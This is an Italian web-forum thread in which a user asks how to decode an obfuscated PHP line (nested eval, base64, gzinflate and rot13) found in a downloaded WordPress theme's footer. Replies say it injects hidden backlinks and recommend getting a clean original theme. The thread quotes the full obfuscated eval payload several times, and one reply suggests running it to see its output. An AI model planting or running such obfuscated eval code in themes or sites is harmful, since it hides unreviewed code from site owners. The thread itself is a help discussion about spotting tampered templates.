Visualizzazione dei risultati da 1 a 6 su 6
  1. #1
    Utente di HTML.it
    Registrato dal
    Sep 2007
    Messaggi
    226

    decriptare codice base64_decode

    ciao
    ho scaricato un tema wordpress e non footer ho trovato questo codice:

    codice:
    <?php @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkWkt4VHNNd0VJWjNKTjdCUklpbVErS05nYnBKcHc0c3NDQ3hWYlpsTzQyS0hWOWlLdzdpM1hHY0ZvR0F5YWY3Ny85T2QrZTZJalYzSFBVTjdaUm5GUFhlNXJlTkNHdjB2b09qRHZtdTl3RU9BNmhEeDZnQ3F1U2lyemNmRzFTZjdidlpsam1sK0FQR0xST1dDNUN5VkE0bWtDVUZWWHFLNjFpMHZjL1d5WFpURk1qQTRHTkh4aFFJVkJUVjlSWEIxaCsvdlRGSy9MbTk5QmFNRm5ueUp5bldvSWpNdWdCYWdNaXFPMm9rMzN4Qkx2clNJVXVtbU9hb0Mxcks2Qk5ndmNxcXA5QUFlbUhDdjhVRldKQitvR0NST1NHaWtSUFFieStUamJxUlRnZnBRTG15WTFOV3ZTNFp0SjlUQk9zcStvOFFHUDhiMExadE9RQ01jdEpqWEkxamFzSDh6TTJja2hpQjhESm41eFZVZTg2b1pPSi9iZ3ZHTWFrOEhVeWN4ekEyTHV4bkI1cWpSekJ4eENUUGVJSVRsR0QreDlaL3Zla0dsaDEwK2lQNXF1V0haYWVyOHpFSU5zeWVVdURVRkdMd0NRPT0iKSkpKTs=")); ?>
    vorrei decriptarlo per vedere cosa c'è scritto..........
    ho cercato on-line per vedere se c'era una risorsa gratuita ma non sono riuscita a trovare niente...

    potete aiutarmi

  2. #2

    Re: decriptare codice base64_decode

    Prova così:
    Codice PHP:
    <?php echo @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkWkt4VHNNd0VJWjNKTjdCUklpbVErS05nYnBKcHc0c3NDQ3hWYlpsTzQyS0hWOWlLdzdpM1hHY0ZvR0F5YWY3Ny85T2QrZTZJalYzSFBVTjdaUm5GUFhlNXJlTkNHdjB2b09qRHZtdTl3RU9BNmhEeDZnQ3F1U2lyemNmRzFTZjdidlpsam1sK0FQR0xST1dDNUN5VkE0bWtDVUZWWHFLNjFpMHZjL1d5WFpURk1qQTRHTkh4aFFJVkJUVjlSWEIxaCsvdlRGSy9MbTk5QmFNRm5ueUp5bldvSWpNdWdCYWdNaXFPMm9rMzN4Qkx2clNJVXVtbU9hb0Mxcks2Qk5ndmNxcXA5QUFlbUhDdjhVRldKQitvR0NST1NHaWtSUFFieStUamJxUlRnZnBRTG15WTFOV3ZTNFp0SjlUQk9zcStvOFFHUDhiMExadE9RQ01jdEpqWEkxamFzSDh6TTJja2hpQjhESm41eFZVZTg2b1pPSi9iZ3ZHTWFrOEhVeWN4ekEyTHV4bkI1cWpSekJ4eENUUGVJSVRsR0QreDlaL3Zla0dsaDEwK2lQNXF1V0haYWVyOHpFSU5zeWVVdURVRkdMd0NRPT0iKSkpKTs=")); ?>
    Ti risulterà la seguente scritta:
    codice:
    </div>
    </div>


    Ma occhio! Questo è un modo illecito per fare in modo che il creatore del layout guadagni in backlinks: se ne è già parlato sul forum, in questo post!!

  3. #3
    Utente di HTML.it
    Registrato dal
    Sep 2007
    Messaggi
    226
    ho provato a copiare il codice che mi hai mandato sontituendo quello trovato nel template.....ma non mi carica più la pagina corretamente?????


    dove sto sbagliando???

  4. #4
    Prova a postare il pezzo di codice in cui hai inserito quella scritta..così gli do un'occhiata..

  5. #5
    Utente di HTML.it
    Registrato dal
    Sep 2007
    Messaggi
    226
    questo è il codice originale :
    codice:
    <?php /* NOTICE: This wordpress theme is provided free as long as you link back to the designer and provider of the theme, If you would like to remove the links back to the designer and provider, Please contact the designer of the theme to buy the rights for use of this template. Removing the following links in the footer is prohibited by law. */ ?><?php @eval(@base64_decode("QGV2YWwoQHN0cl9yb3QxMyhAZ3ppbmZsYXRlKEBiYXNlNjRfZGVjb2RlKCJkWkt4VHNNd0VJWjNKTjdCUklpbVErS05nYnBKcHc0c3NDQ3hWYlpsTzQyS0hWOWlLdzdpM1hHY0ZvR0F5YWY3Ny85T2QrZTZJalYzSFBVTjdaUm5GUFhlNXJlTkNHdjB2b09qRHZtdTl3RU9BNmhEeDZnQ3F1U2lyemNmRzFTZjdidlpsam1sK0FQR0xST1dDNUN5VkE0bWtDVUZWWHFLNjFpMHZjL1d5WFpURk1qQTRHTkh4aFFJVkJUVjlSWEIxaCsvdlRGSy9MbTk5QmFNRm5ueUp5bldvSWpNdWdCYWdNaXFPMm9rMzN4Qkx2clNJVXVtbU9hb0Mxcks2Qk5ndmNxcXA5QUFlbUhDdjhVRldKQitvR0NST1NHaWtSUFFieStUamJxUlRnZnBRTG15WTFOV3ZTNFp0SjlUQk9zcStvOFFHUDhiMExadE9RQ01jdEpqWEkxamFzSDh6TTJja2hpQjhESm41eFZVZTg2b1pPSi9iZ3ZHTWFrOEhVeWN4ekEyTHV4bkI1cWpSekJ4eENUUGVJSVRsR0QreDlaL3Zla0dsaDEwK2lQNXF1V0haYWVyOHpFSU5zeWVVdURVRkdMd0NRPT0iKSkpKTs=")); ?>
    <p class="collegamento">Design by xxxxxx
    <p id="meta1">
    <?php wp_register(); ?><?php wp_loginout(); ?>
    </p>
    questo è quello che ho incollato dopo:

    -prima ho fatto semplicemente così:
    codice:
    </div>
    </div>
    <p class="collegamento">Design by xxxxxxx
    <p id="meta1">
    <?php wp_register(); ?><?php wp_loginout(); ?>
    </p>
    - poi ho inserito la sidebar
    codice:
    </div>
    <?php get_sidebar(); ?>
    </div>
    <p class="collegamento">Design by xxxxxxx
    <p id="meta1">
    <?php wp_register(); ?><?php wp_loginout(); ?>
    </p>
    ma comunque non stamapa la pagina correttamente.
    Prima inl quadrato centrale era tutto bianco......ora invece è bianco solo la prima parte in alto e tutto il resto è del colore dello sfondo.....è come se mancasse un pezzo di codice.

  6. #6
    Il mio consiglio, per evitare problemi di qualunque genere, è di scaricarti la versione originale del template, perchè quella di cui disponi tu è stata modificata in modo illecito.
    Quindi, invece che modificare questa, credo sia più semplice scaricarti l'originale da un sito più affidabile.


Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.